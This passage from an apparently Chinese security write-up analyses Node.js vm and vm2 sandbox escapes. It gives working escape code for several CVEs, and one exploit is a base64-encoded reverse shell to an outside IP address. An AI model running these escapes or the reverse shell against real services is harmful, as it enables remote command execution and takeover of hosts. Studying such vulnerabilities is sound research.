<h5 id="arguments"><a href="#arguments" class="headerlink" title="arguments"></a>arguments</h5><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//arguments是一个Object对象</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">a</span>(<span class="params"></span>)&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable language_">arguments</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">a</span>())</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">a</span>(<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>))</span><br><span class="line"><span class="comment">// [Arguments] &#123;&#125;</span></span><br><span class="line"><span class="comment">// [Arguments] &#123; &#x27;0&#x27;: 1, &#x27;1&#x27;: 2, &#x27;2&#x27;: 3 &#125;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//caller.caller为arguments对象的一个成员，它的值为正被执行的Function对象</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">ac</span>(<span class="params"></span>)&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable language_">arguments</span>.<span class="property">callee</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">ac</span>())</span><br><span class="line"><span class="comment">// [Function: ac]</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//arguments.callee.caller调用当前函数的外层函数，如果是单函数无嵌套的话就是null/anonymous</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">acc</span>(<span class="params"></span>)&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable language_">arguments</span>.<span class="property">callee</span>.<span class="property">caller</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">acc</span>())</span><br><span class="line"><span class="comment">// [Function (anonymous)]</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">acc2</span>(<span class="params"></span>)&#123;</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">tset</span>(<span class="params"></span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">arguments</span>.<span class="property">callee</span>.<span class="property">caller</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_">tset</span>();</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">acc2</span>())</span><br><span class="line"><span class="comment">// [Function: acc2]</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">acc3</span>(<span class="params"></span>)&#123;</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">test2</span>(<span class="params"></span>)&#123;</span><br><span class="line">        <span class="keyword">function</span> <span class="title function_">test3</span>(<span class="params"></span>)&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="variable language_">arguments</span>.<span class="property">callee</span>.<span class="property">caller</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="title function_">test3</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_">test2</span>();</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">acc3</span>())</span><br><span class="line"><span class="comment">// [Function: test2]</span></span><br></pre></td></tr></table></figure>

<h5 id="利用arguments-callee-caller绕过"><a href="#利用arguments-callee-caller绕过" class="headerlink" title="利用arguments.callee.caller绕过"></a>利用arguments.callee.caller绕过</h5><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> vm = <span class="built_in">require</span>(<span class="string">&#x27;vm&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> sandbox = &#123;&#125;	</span><br><span class="line"><span class="comment">//context = Object.create(null);</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> script = </span><br><span class="line"><span class="string">`(() =&gt; &#123;</span></span><br><span class="line"><span class="string">    const a = &#123;&#125;</span></span><br><span class="line"><span class="string">    a.toString = function()&#123;</span></span><br><span class="line"><span class="string">        const cc = arguments.callee.caller;</span></span><br><span class="line"><span class="string">        const p = (cc.constructor.constructor(&#x27;return process&#x27;))();</span></span><br><span class="line"><span class="string">        return p.mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;whoami&#x27;).toString()</span></span><br><span class="line"><span class="string">    &#125;</span></span><br><span class="line"><span class="string">    return a </span></span><br><span class="line"><span class="string">&#125;)()</span></span><br><span class="line"><span class="string">`</span></span><br><span class="line"><span class="keyword">const</span> context =<span class="keyword">new</span> vm.<span class="title function_">createContext</span>(sandbox); <span class="comment">//上下文隔离对象</span></span><br><span class="line"><span class="keyword">const</span> res = vm.<span class="title function_">runInContext</span>(script,context);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;[*]whoami: &#x27;</span>+ res)</span><br></pre></td></tr></table></figure>

<p><img src="/posts/bfeb5984/8.png" alt="img"></p>
<h4 id="利用Proxy代理绕过"><a href="#利用Proxy代理绕过" class="headerlink" title="利用Proxy代理绕过"></a>利用Proxy代理绕过</h4><p>如果沙箱外没有执行字符串相关操作来触发toString，且也无法利用恶意重写的函数时，可以使用proxy来劫持属性</p>
<h5 id="通过get钩子获取对象属性RCE的利用代码"><a href="#通过get钩子获取对象属性RCE的利用代码" class="headerlink" title="通过get钩子获取对象属性RCE的利用代码"></a>通过get钩子获取对象属性RCE的利用代码</h5><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> vm = <span class="built_in">require</span>(<span class="string">&quot;vm&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">//const sandbox = &#123;&#125;</span></span><br><span class="line"><span class="keyword">const</span> sandbox = <span class="title class_">Object</span>.<span class="title function_">create</span>(<span class="literal">null</span>);</span><br><span class="line"><span class="keyword">const</span> script = </span><br><span class="line"><span class="string">`</span></span><br><span class="line"><span class="string">(</span></span><br><span class="line"><span class="string">    ()=&gt;&#123;</span></span><br><span class="line"><span class="string">        const proxy = new Proxy(&#123;&#125;, &#123;</span></span><br><span class="line"><span class="string">            get : function()&#123;</span></span><br><span class="line"><span class="string">                const cc = arguments.callee.caller;</span></span><br><span class="line"><span class="string">                const p = (cc.constructor.constructor(&#x27;return process&#x27;))();</span></span><br><span class="line"><span class="string">                return p.mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;whoami&#x27;).toString();</span></span><br><span class="line"><span class="string">            &#125;</span></span><br><span class="line"><span class="string">        &#125;)</span></span><br><span class="line"><span class="string">        return proxy</span></span><br><span class="line"><span class="string">    &#125;</span></span><br><span class="line"><span class="string">)()</span></span><br><span class="line"><span class="string">`</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> context = <span class="keyword">new</span> vm.<span class="title function_">createContext</span>(sandbox);</span><br><span class="line"><span class="keyword">const</span> res = vm.<span class="title function_">runInContext</span>(script, context);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[*]whoami:&quot;</span> + res)</span><br></pre></td></tr></table></figure>

<p>没有输出 </p>
<p><img src="/posts/bfeb5984/9.png" alt="img"></p>
<p>调试后发现 这里 res作为输出 如果是选择res输出的话 会输出res的值 而输出一个res不存在的方法时 就会触发RCE  …..  但是在后面调试的时候 之前没有报错会返回whoami的结果  后面又触发了异常，在异常中输出了whoami的结果test (好像是whoami命令时候有点异常 换做ls命令还算正常触发了rce)   </p>
<p>下图是调试状态下载调试控制台输出的结果 </p>
<p><img src="/posts/bfeb5984/10.png" alt="img"></p>
<p>如果直接运行会触发异常 在异常中会输出结果 这是whomai的结果  有时候不会触发异常 不会输出结果</p>
<p><img src="/posts/bfeb5984/11.png" alt="img"></p>
<p>但是换成ls命令后 便可正常rce   😓@_@</p>
<p><img src="/posts/bfeb5984/12.png" alt="img"></p>
<h5 id="利用异常抛出沙箱内对象"><a href="#利用异常抛出沙箱内对象" class="headerlink" title="利用异常抛出沙箱内对象"></a>利用异常抛出沙箱内对象</h5><p>通过异常 将沙箱内的对象抛出并在外部输出</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> vm = <span class="built_in">require</span>(<span class="string">&quot;vm&quot;</span>);</span><br><span class="line"><span class="keyword">const</span> sandbox = &#123;&#125;</span><br><span class="line"><span class="keyword">const</span> script = </span><br><span class="line"><span class="string">`</span></span><br><span class="line"><span class="string">    throw new Proxy(&#123;&#125;, &#123;</span></span><br><span class="line"><span class="string">        get: function()&#123;</span></span><br><span class="line"><span class="string">            const cc = arguments.callee.caller;</span></span><br><span class="line"><span class="string">            const p = (cc.constructor.constructor(&#x27;return process&#x27;))();</span></span><br><span class="line"><span class="string">            return p.mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;ls&#x27;).toString();</span></span><br><span class="line"><span class="string">        &#125;</span></span><br><span class="line"><span class="string">    &#125;)</span></span><br><span class="line"><span class="string">`</span>;</span><br><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    vm.<span class="title function_">runInContext</span>(script, vm.<span class="title function_">createContext</span>(sandbox));</span><br><span class="line">&#125;<span class="keyword">catch</span>(e) &#123;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;error:&quot;</span> + e) </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/posts/bfeb5984/13.png" alt="img"></p>
<h3 id="VM2沙箱"><a href="#VM2沙箱" class="headerlink" title="VM2沙箱"></a>VM2沙箱</h3><p>vm2 是在vm基础上实现的沙箱   内部调用的还是vm的API，使用JavaScript的Proxy技术来防止沙箱逃逸</p>
<p>(Proxy 可参考：<a target="_blank" rel="noopener" href="https://juejin.cn/post/6844904090116292616">https://juejin.cn/post/6844904090116292616</a>)</p>
<h4 id="VM2结构"><a href="#VM2结构" class="headerlink" title="VM2结构"></a>VM2结构</h4><p><a href="mailto:&#x76;&#x6d;&#x32;&#x40;&#51;&#46;&#x39;&#x2e;&#49;&#52;">&#x76;&#x6d;&#x32;&#x40;&#51;&#46;&#x39;&#x2e;&#49;&#52;</a>下结构如下</p>
<p><img src="/posts/bfeb5984/14.png" alt="img"></p>
<p><a href="mailto:&#x76;&#109;&#x32;&#x40;&#51;&#x2e;&#x36;&#x2e;&#49;&#48;">&#x76;&#109;&#x32;&#x40;&#51;&#x2e;&#x36;&#x2e;&#49;&#48;</a>下结构如下</p>
<p><img src="/posts/bfeb5984/15.png" alt="img"></p>
<p>相比新版本下，该版本的结构要简单多 便于去理解其原理</p>
<p>主要包括4个js文件  <code>cli.js</code> <code>contextify.js</code> <code>main.js</code> <code>sandbox.js</code></p>
<p>其中 cli.js 主要是命令行的调用</p>
<p><img src="/posts/bfeb5984/16.png" alt="img"></p>
<p><img src="/posts/bfeb5984/17.png" alt="img"></p>
<p>contextify.js 封装了三个对象：Decontextify、Contextify   并针对 global的Buffer类进行的代理</p>
<p><img src="/posts/bfeb5984/18.png" alt="img"></p>
<p>sandbox.js  对global的一些函数和变量进行了hook，比如setTimeout、setInterval、setImmediate等</p>
<p><img src="/posts/bfeb5984/19.png" alt="img"></p>
<p>main.js 执行入口点 导出NodeVM、VM这两个沙箱环境和VMScript(封装了vm.Script)</p>
<p><img src="/posts/bfeb5984/20.png" alt="img"></p>
<h4 id="VM2运行原理"><a href="#VM2运行原理" class="headerlink" title="VM2运行原理"></a>VM2运行原理</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> &#123;<span class="variable constant_">VM</span>, <span class="title class_">VMScript</span>&#125; = <span class="built_in">require</span>(<span class="string">&quot;vm2&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> script = <span class="keyword">new</span> <span class="title class_">VMScript</span>(<span class="string">&quot;let a = 2;a&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> vm = <span class="keyword">new</span> <span class="title function_">VM</span>();</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(vm.<span class="title function_">run</span>(script));</span><br></pre></td></tr></table></figure>

<p><img src="/posts/bfeb5984/21.png" alt="img"></p>
<p>图片源自<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/207283#h2-1">https://www.anquanke.com/post/id/207283#h2-1</a></p>
<p>当创建一个VM对象后，vm2内部引入contextify.js 并对context上下文进行封装，最后再调用<code>script.runInContext(context)</code>。从图便可看出vm2核心操作在于针对于对context的封装上。</p>
<p>原理分析 调试 可参考 </p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/207283#h2-3">https://www.anquanke.com/post/id/207283#h2-3</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/anwen12/article/details/120445707">https://blog.csdn.net/anwen12/article/details/120445707</a></p>
<p><a target="_blank" rel="noopener" href="https://0xgeekcat.github.io/%E7%AE%80%E5%8D%95%E4%BA%86%E8%A7%A3Node.js%E6%B2%99%E7%AE%B1%E7%8E%AF%E5%A2%83%E5%B9%B6%E5%88%86%E6%9E%90VM2%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86.html#reference">https://0xgeekcat.github.io/%E7%AE%80%E5%8D%95%E4%BA%86%E8%A7%A3Node.js%E6%B2%99%E7%AE%B1%E7%8E%AF%E5%A2%83%E5%B9%B6%E5%88%86%E6%9E%90VM2%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86.html#reference</a></p>
<p>runInContext -&gt; Decontextify.value</p>
<p><img src="/posts/bfeb5984/22.png" alt="img"></p>
<h3 id="VM2下沙箱逃逸漏洞分析"><a href="#VM2下沙箱逃逸漏洞分析" class="headerlink" title="VM2下沙箱逃逸漏洞分析"></a>VM2下沙箱逃逸漏洞分析</h3><h4 id="CVE-2019-10761"><a href="#CVE-2019-10761" class="headerlink" title="CVE-2019-10761"></a>CVE-2019-10761</h4><p>参考 </p>
<p><a target="_blank" rel="noopener" href="https://github.com/patriksimek/vm2/issues/197">https://github.com/patriksimek/vm2/issues/197</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/advisories/GHSA-wf5x-cr3r-xr77">https://github.com/advisories/GHSA-wf5x-cr3r-xr77</a></p>
<p><a target="_blank" rel="noopener" href="https://gist.github.com/JLLeitschuh/609bb2efaff22ed84fe182cf574c023a">https://gist.github.com/JLLeitschuh/609bb2efaff22ed84fe182cf574c023a</a></p>
<p>vm2 &lt; 3.6.11</p>
<p><a target="_blank" rel="noopener" href="https://github.com/advisories/GHSA-wf5x-cr3r-xr77">https://github.com/advisories/GHSA-wf5x-cr3r-xr77</a></p>
<p>安装 npm i <a href="mailto:&#x76;&#109;&#50;&#64;&#x33;&#46;&#54;&#46;&#49;&#48;">&#x76;&#109;&#50;&#64;&#x33;&#46;&#54;&#46;&#49;&#48;</a></p>
<p>下载完后会在桌面下生成一恶搞node_modules 里面有安装的vm2 …. 之前没注意 因为前面安装时候是在.nvm下默认安装的</p>
<p><img src="/posts/bfeb5984/23.png" alt="img"></p>
<p><img src="/posts/bfeb5984/24.png" alt="img"></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&quot;use strict&quot;</span>;</span><br><span class="line"><span class="keyword">const</span> &#123;<span class="variable constant_">VM</span>&#125; = <span class="built_in">require</span>(<span class="string">&#x27;vm2&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> untrusted = <span class="string">`</span></span><br><span class="line"><span class="string">const f = Buffer.prototype.write;</span></span><br><span class="line"><span class="string">const ft = &#123;</span></span><br><span class="line"><span class="string">		length: 10,</span></span><br><span class="line"><span class="string">		utf8Write()&#123;		&#125;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">function r(i)&#123;  </span></span><br><span class="line"><span class="string">	var x = 0;</span></span><br><span class="line"><span class="string">	try&#123;</span></span><br><span class="line"><span class="string">		x = r(i);</span></span><br><span class="line"><span class="string">	&#125;catch(e)&#123;&#125;</span></span><br><span class="line"><span class="string">	if(typeof(x)!==&#x27;number&#x27;)</span></span><br><span class="line"><span class="string">		return x;</span></span><br><span class="line"><span class="string">	if(x!==i)</span></span><br><span class="line"><span class="string">		return x+1;</span></span><br><span class="line"><span class="string">	try&#123;</span></span><br><span class="line"><span class="string">		f.call(ft);</span></span><br><span class="line"><span class="string">	&#125;catch(e)&#123;</span></span><br><span class="line"><span class="string">		return e;</span></span><br><span class="line"><span class="string">	&#125;</span></span><br><span class="line"><span class="string">	return null;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">var i=1;</span></span><br><span class="line"><span class="string">while(1)&#123;</span></span><br><span class="line"><span class="string">	try&#123;</span></span><br><span class="line"><span class="string">		i=r(i).constructor.constructor(&quot;return process&quot;)();</span></span><br><span class="line"><span class="string">		break;</span></span><br><span class="line"><span class="string">	&#125;catch(x)&#123;</span></span><br><span class="line"><span class="string">		i++;</span></span><br><span class="line"><span class="string">	&#125;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">i.mainModule.require(&quot;child_process&quot;).execSync(&quot;whoami&quot;).toString()</span></span><br><span class="line"><span class="string">`</span>;</span><br><span class="line"><span class="keyword">try</span>&#123;</span><br><span class="line">	<span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="keyword">new</span> <span class="title function_">VM</span>().<span class="title function_">run</span>(untrusted));</span><br><span class="line">&#125;<span class="keyword">catch</span>(x)&#123;</span><br><span class="line">	<span class="variable language_">console</span>.<span class="title function_">log</span>(x);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/posts/bfeb5984/25.png" alt="img"></p>
<p>假设最大次数为 1000 当递归到最高次数是 </p>
<p>r(i) 递归函数</p>
<p>f.call(ft);  </p>
<p>ft:  this.utf8Write() </p>
<p>沙箱逃逸 从沙箱外获取一个对象，然后获取这个对象的constructor属性。</p>
<p>这个poc链通过 多次递归调用 当达到一定次数后(超过最大调用堆栈的大小)，当我们正在调用沙箱外的函数时，就会导致沙箱外的调用栈被爆掉，我们在沙箱内catch这个异常对象，就拿到了一个沙箱外的对象</p>
<h4 id="CVE-2021-23449"><a href="#CVE-2021-23449" class="headerlink" title="CVE-2021-23449"></a>CVE-2021-23449</h4><p>vm2 &lt; 3.9.4</p>
<p>参考以下p牛的说法:</p>
<p>在JavaScript中 import()是一个语法结构，并不是一个函数，无法通过像是使用require的方法来处理import</p>
<p>在调用import()的结果实际上并没有经过沙箱，是一个外部变量，可以直接获取constructor进而获取到process对象来实现命令执行</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> res = <span class="keyword">import</span>(<span class="string">&#x27;./foo.js&#x27;</span>)</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(res.<span class="property">toString</span>.<span class="title function_">constructor</span>(<span class="params"><span class="string">&quot;return this&quot;</span></span>)(<span class="params"></span>).<span class="property">process</span>.<span class="property">mainModule</span>.<span class="built_in">require</span>(<span class="string">&quot;child_process&quot;</span>).<span class="title function_">execSync</span>(<span class="string">&quot;pwd&quot;</span>).<span class="title function_">toString</span>());</span><br></pre></td></tr></table></figure>

<p><img src="/posts/bfeb5984/26.png" alt="img"></p>
<h4 id="CVE-2022-36067"><a href="#CVE-2022-36067" class="headerlink" title="CVE-2022-36067"></a>CVE-2022-36067</h4><p>参考 <a target="_blank" rel="noopener" href="https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067">https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/advisories/GHSA-mrgp-mrhc-5jrq">https://github.com/advisories/GHSA-mrgp-mrhc-5jrq</a></p>
<h4 id="CVE-2023-29017"><a href="#CVE-2023-29017" class="headerlink" title="CVE-2023-29017"></a>CVE-2023-29017</h4><p>在处理异步错误时 未正确处理<code> Error.prepareStackTrace的</code>宿主对象 从而实现沙箱绕过。当异常发生时，可以使用Error.prepareStackTrace自定义异常</p>
<p>在sandbox.js中 定义类</p>
<h5 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h5><p>vm2 &lt;= 3.9.14</p>
<p>同时需要 Node.js 版本满足以下条件：</p>
<p>Node.js &gt; 16.14.0</p>
<p>Node.js &gt; 17.4.0</p>
<p>Node.js 18.x</p>
<p>Node.js 19.x</p>
<h5 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h5><h6 id="安装node-js"><a href="#安装node-js" class="headerlink" title="安装node js"></a>安装node js</h6><p>安装 nvm</p>
<p>curl -o- <a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/nvm-sh/nvm/v0.35.3/install.sh">https://raw.githubusercontent.com/nvm-sh/nvm/v0.35.3/install.sh</a> | bash</p>
<p>查看nodejs可安装版本(重启一个终端)</p>
<p>nvm ls-remote</p>
<p>安装指定版本的nodejs</p>
<p>nvm install v17.5.0</p>
<p><img src="/posts/bfeb5984/27.png" alt="img"></p>
<h6 id="安装vm2"><a href="#安装vm2" class="headerlink" title="安装vm2"></a>安装vm2</h6><p>npm install <a href="mailto:&#118;&#109;&#x32;&#64;&#x33;&#x2e;&#x39;&#x2e;&#49;&#x34;">&#118;&#109;&#x32;&#64;&#x33;&#x2e;&#x39;&#x2e;&#49;&#x34;</a>        （npm install 安装指定版本时 后面@加版本号即可）</p>
<h5 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h5><p>问题主要在于sst这个地方 没有考虑sst是否是沙箱处理过的对象，如果是一个宿主的对象，那么这个sst可以在<code>prepareStackTrcae</code>执行时作为参数使用</p>
<p><img src="/posts/bfeb5984/28.png" alt="img"></p>
<p>在漏洞<a target="_blank" rel="noopener" href="https://github.com/patriksimek/vm2/commit/d534e5785f38307b70d3aac1945260a261a94d50">修复</a>中 使用<code>ensureThis（）</code>函数对sst进行验证，确保该函数是经过Proxy处理的对象</p>
<p><img src="/posts/bfeb5984/29.png" alt="img"></p>
<p>分析文章可以参考 </p>
<p><a target="_blank" rel="noopener" href="https://github.com/patriksimek/vm2/issues/515">https://github.com/patriksimek/vm2/issues/515</a></p>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/OwQ3B5vjpr9ZsvOXftJoQg">https://mp.weixin.qq.com/s/OwQ3B5vjpr9ZsvOXftJoQg</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/patriksimek/vm2/commit/d534e5785f38307b70d3aac1945260a261a94d50">https://github.com/patriksimek/vm2/commit/d534e5785f38307b70d3aac1945260a261a94d50</a></p>
<h5 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h5><p><a target="_blank" rel="noopener" href="https://gist.github.com/seongil-wi/2a44e082001b959bfe304b62121fb76d">https://gist.github.com/seongil-wi/2a44e082001b959bfe304b62121fb76d</a></p>
<p>反弹shell</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> &#123;<span class="variable constant_">VM</span>&#125; = <span class="built_in">require</span>(<span class="string">&quot;vm2&quot;</span>);</span><br><span class="line"><span class="keyword">let</span> vmInstance = <span class="keyword">new</span> <span class="title function_">VM</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> code = <span class="string">`</span></span><br><span class="line"><span class="string">Error.prepareStackTrace = (e, frames) =&gt; &#123;</span></span><br><span class="line"><span class="string">    frames.constructor.constructor(&#x27;return process&#x27;)().mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDYuNTIuMjIxLjcxLzg4ODggMD4mMQ==|base64 -d|bash&#x27;); </span></span><br><span class="line"><span class="string">&#125;;</span></span><br><span class="line"><span class="string">(async ()=&gt;&#123;&#125;).constructor(&#x27;return process&#x27;)()</span></span><br><span class="line"><span class="string">`</span></span><br><span class="line"></span><br><span class="line">vmInstance.<span class="title function_">run</span>(code);</span><br></pre></td></tr></table></figure>

<p><img src="/posts/bfeb5984/30.png" alt="img"></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">aa</span>(<span class="params"></span>)&#123;</span><br><span class="line">    <span class="built_in">eval</span>(<span class="string">&quot;1=1&quot;</span>)</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_">aa</span>()</span><br><span class="line"></span><br><span class="line"><span class="comment">// 通过async产生一个未处理的异步异常  </span></span><br><span class="line"><span class="comment">// eval()在aa函数中跑出一个语法错误来触发一个未处理的异步错误</span></span><br></pre></td></tr></table></figure>



<h4 id="CVE-2023-29199"><a href="#CVE-2023-29199" class="headerlink" title="CVE-2023-29199"></a>CVE-2023-29199</h4><p>影响版本 &lt;=3.9.15  </p>
<p>这里有篇 transformer的源码分析的文章 可参考 <a target="_blank" rel="noopener" href="https://blog.csdn.net/Yy_Rose/article/details/127534335">https://blog.csdn.net/Yy_Rose/article/details/127534335</a></p>
<p>攻击者可以使用<code>$tmpname</code>的标识符去绕过 handleExecption()实现沙箱逃逸到达rce的效果</p>
<h5 id="漏洞分析-1"><a href="#漏洞分析-1" class="headerlink" title="漏洞分析"></a>漏洞分析</h5><p>问题出现在transformer.js 下的transformer函数，先简单看一下transformer的代码</p>
<p>在transform.js中 先导入了acron(js的一个解析器) 和 acorn-walk(提供遍历) ，然后定义了一个字符串对象INTERNAL_STATE_NAME 后面也会再次用到</p>
<p><img src="/posts/bfeb5984/31.png" alt="img"></p>
